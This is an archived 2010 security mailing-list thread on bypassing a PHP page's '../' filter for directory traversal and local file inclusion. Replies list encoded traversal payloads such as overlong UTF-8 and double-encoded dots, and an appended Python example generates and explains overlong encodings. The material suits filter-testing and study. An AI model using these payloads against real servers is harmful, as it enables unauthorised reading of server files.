
List:       websecurity
Subject:    Re: [WEB SECURITY] ../ filtered
From:       NeZa <neza0x () gmail ! com>
Date:       2010-02-22 20:51:40
Message-ID: 594f48571002221251h34525ba9m78d875f0052272be () mail ! gmail ! com

Hey Shlomi, excellent tips, but I am wondering if you have written about how to
convert from hex to UTF-8, in order to create my own tests.
I mean, as you know, %2e can be UTF-8 converted to:

C0 AE (11000000 10101110)

E0 80 AE (11100000 10000000 10101110)

F0 80 80 AE (11110000 10000000 10000000 10101110)

F8 80 80 80 AE (11111000 10000000 10000000 10000000 10101110)

FC 80 80 80 80 AE (11111100 10000000 10000000 10000000 10000000 10101110)

But I do not understand how it was converted from %2e to %C0 %AE and the others.

Any documentation?

On Mon, Feb 22, 2010 at 3:51 AM, Shlomi Narkolayev <shlominar@gmail.com> wrote:

> If ".." is rejected, so try these:
> %c0%ae%c0%ae\FILENAME
> %uff0e%uff0e/FILENAME
> %c0%ae%c0%ae/FILENAME
> %2e%2e%5cFILENAME
> %2e%2e\%2e%2e\FILENAME
> %2e%2e%2fFILENAME
> 
> If you still need more combinations, check my blog
> <http://narkolayev-shlomi.blogspot.com/> in a few days for the full list.
> 
> Kind Regards,
> Narkolayev Shlomi.
> 
> *From:* Beatriz Duran [mailto:beatrizdrn@yahoo.com]
> *Sent:* Tuesday, February 16, 2010 4:40 PM
> 
> *To:* Shlomi Narkolayev; websecurity@webappsec.org
> *Subject:* Re: [WEB SECURITY] ../ filtered
> 
> Shlomi,
> 
> I tried those already; but they and the ones with ".." are rejected. The
> variable is verifying the string before running it, and with the combination
> 
> %252e%252e/FILENAME this happens:
> 
> viewfiles.php?folder=%252e%252e/
> 
> The 25s are removed, so the %2e%2e is left but transformed into pure text,
> so the page reports that the directory %2e%2e doesn't exist; but if I apply
> purely viewfiles.php?folder=%2e%2e/ the page rejects it and says .. is not
> allowed.
> 
> I Have Learned So much from God That I can no longer Call Myself A
> Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much
> of Itself With me That I can no longer call myself A man, a woman, and angel
> Or even pure Soul. Love has Befriended Hafiz so completely It has turned to
> ash And freed Me Of every concept and image My mind has ever known. –Hafiz,
> Persian poet (1315 – 1390)
> 
> ------------------------------
> 
> *From:* Shlomi Narkolayev <shlominar@gmail.com>
> *To:* beatrizdrn@yahoo.com; websecurity@webappsec.org
> *Sent:* Tue, February 16, 2010 12:41:16 AM
> *Subject:* RE: [WEB SECURITY] ../ filtered
> 
> Try these:
> ..%5c..%5cFILENAME
> %2e%2e\%2e%2e\FILENAME
> ..%c0%af..%c0%afFILENAME
> ..%255c..%255cFILENAME
> %252e%252e/FILENAME
> ..%2f..%2fFILENAME
> ..%252f..%252fFILENAME
> 
> 
> Soon I'll upload to my blog <http://narkolayev-shlomi.blogspot.com/> new
> 1400 variants for directory traversal.
> 
> Kind Regards,
> Narkolayev Shlomi.
> 
> *From:* Beatriz Duran [mailto:beatrizdrn@yahoo.com]
> *Sent:* Monday, February 15, 2010 9:43 AM
> *To:* websecurity@webappsec.org
> *Subject:* [WEB SECURITY] ../ filtered
> 
> Hi, I need to find a vulnerability in a URL that could be exploited for
> directory traversal and LFI; the page is working with PHP but it is
> filtering /../ and also /%2e%2e/. Because the page is using ISO for Latin
> characters I can't use extended Unicode, because it reinterprets it with other
> values; is there another way to work around the filter?
> 


-- 
NeZa
Hacker Wanna Be from Nezahualcoyotl
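An added worked example, written for this archive page and not code from any poster in the thread, showing the mechanics NeZa asks about. '.' is 0x2E, binary 0101110. UTF-8 multibyte sequences are a lead byte of the form 110xxxxx, 1110xxxx, 11110xxx (and, in the old RFC 2279 layout, 111110xx and 1111110x) followed by continuation bytes of the form 10xxxxxx. Packing 0x2E into the payload bits of a 2-byte sequence and padding with zeros gives 11000000 10101110, i.e. C0 AE; every extra length adds one more leading 1 to the lead byte and one all-zero continuation byte 10000000 in the middle, which is exactly the progression in NeZa's list. Only the shortest form is valid UTF-8 (RFC 3629 forbids overlong forms and the 5- and 6-byte lengths outright), so a bypass built this way only works against a decoder that does not enforce that; Python's own decoder is strict, so the block includes a small lenient decoder to stand in for the permissive kind. The `path_after_decoding` helper is a hypothetical model of a server's decode chain, with a `rounds` parameter to reproduce the single- versus double-decoding difference Beatriz describes for %252e. `%uff0e` in Shlomi's list is a different mechanism (the non-standard `%uXXXX` encoding) and is not covered here.

```python
"""Overlong UTF-8 forms of a code point, and what lenient vs. strict decoders
make of them.  Added example; not code from the mailing-list thread."""
import urllib.parse


def overlong_utf8(cp: int, nbytes: int) -> bytes:
    """Encode code point `cp` as an `nbytes`-long UTF-8 sequence, padding the
    payload with leading zero bits even when a shorter form exists.  Only the
    shortest form is valid UTF-8; 5- and 6-byte forms follow the old RFC 2279
    layout and are forbidden by RFC 3629.  This builds test strings, it is not
    a conforming encoder."""
    if nbytes == 1:
        if cp > 0x7F:
            raise ValueError("code point does not fit in one byte")
        return bytes([cp])
    if not 2 <= nbytes <= 6:
        raise ValueError("UTF-8 sequences are 1..6 bytes long")
    # payload capacity: the lead byte holds (7 - nbytes) bits, each continuation 6
    if cp >= 1 << (5 * nbytes + 1):
        raise ValueError("code point does not fit in %d bytes" % nbytes)
    lead_marker = (0xFF << (8 - nbytes)) & 0xFF      # 110xxxxx, 1110xxxx, ...
    seq = [lead_marker | (cp >> (6 * (nbytes - 1)))]
    for shift in range(6 * (nbytes - 2), -1, -6):    # continuation bytes 10xxxxxx
        seq.append(0x80 | ((cp >> shift) & 0x3F))
    return bytes(seq)


def percent_encode(data: bytes) -> str:
    """Percent-encode every byte, the way the payloads in the thread are written."""
    return "".join("%%%02X" % b for b in data)


def overlong_forms(cp: int) -> dict:
    """All percent-encoded overlong forms of `cp`, keyed by sequence length."""
    return {n: percent_encode(overlong_utf8(cp, n)) for n in range(2, 7)}


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 by bit layout only, accepting overlong forms and 5/6-byte
    sequences.  This stands in for the permissive decoders the bypass targets."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            n, cp = 1, b
        elif b >= 0xFC:
            n, cp = 6, b & 0x01
        elif b >= 0xF8:
            n, cp = 5, b & 0x03
        elif b >= 0xF0:
            n, cp = 4, b & 0x07
        elif b >= 0xE0:
            n, cp = 3, b & 0x0F
        elif b >= 0xC0:
            n, cp = 2, b & 0x1F
        else:
            raise ValueError("unexpected continuation byte at offset %d" % i)
        for k in range(1, n):
            if i + k >= len(data) or data[i + k] & 0xC0 != 0x80:
                raise ValueError("truncated sequence at offset %d" % i)
            cp = (cp << 6) | (data[i + k] & 0x3F)
        out.append(chr(cp))
        i += n
    return "".join(out)


def strict_utf8_decode(data: bytes):
    """Python's built-in decoder: rejects overlong forms and the C0/C1/F8..FF
    lead bytes.  Returns None instead of raising so callers can compare."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def path_after_decoding(fragment: str, rounds: int = 1, lenient: bool = False):
    """Hypothetical model of a server's decode chain: percent-decode `fragment`
    `rounds` times, then interpret the bytes as UTF-8 with either decoder.
    Returns None when the strict decoder rejects the bytes."""
    raw = fragment.encode("ascii")
    for _ in range(rounds):
        raw = urllib.parse.unquote_to_bytes(raw)
    return lenient_utf8_decode(raw) if lenient else strict_utf8_decode(raw)


if __name__ == "__main__":
    for n, form in overlong_forms(0x2E).items():
        print("%d-byte form of '.': %s" % (n, form))
    for payload in ("%2e%2e/", "%252e%252e/", "%c0%ae%c0%ae/"):
        print(payload,
              "| 1 round, strict:", path_after_decoding(payload),
              "| 2 rounds, strict:", path_after_decoding(payload, rounds=2),
              "| 1 round, lenient:", path_after_decoding(payload, lenient=True))
```

Running it prints the five overlong forms of '.' (%C0%AE through %FC%80%80%80%80%AE) and shows that %252e%252e/ becomes the literal text %2e%2e/ after one decode and ../ only after a second, while %c0%ae%c0%ae/ is rejected by the strict decoder and becomes ../ under the lenient one. The same `overlong_utf8` call with 0x2F and 2 gives the %c0%af slash used in Shlomi's `..%c0%af..%c0%af` variant.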

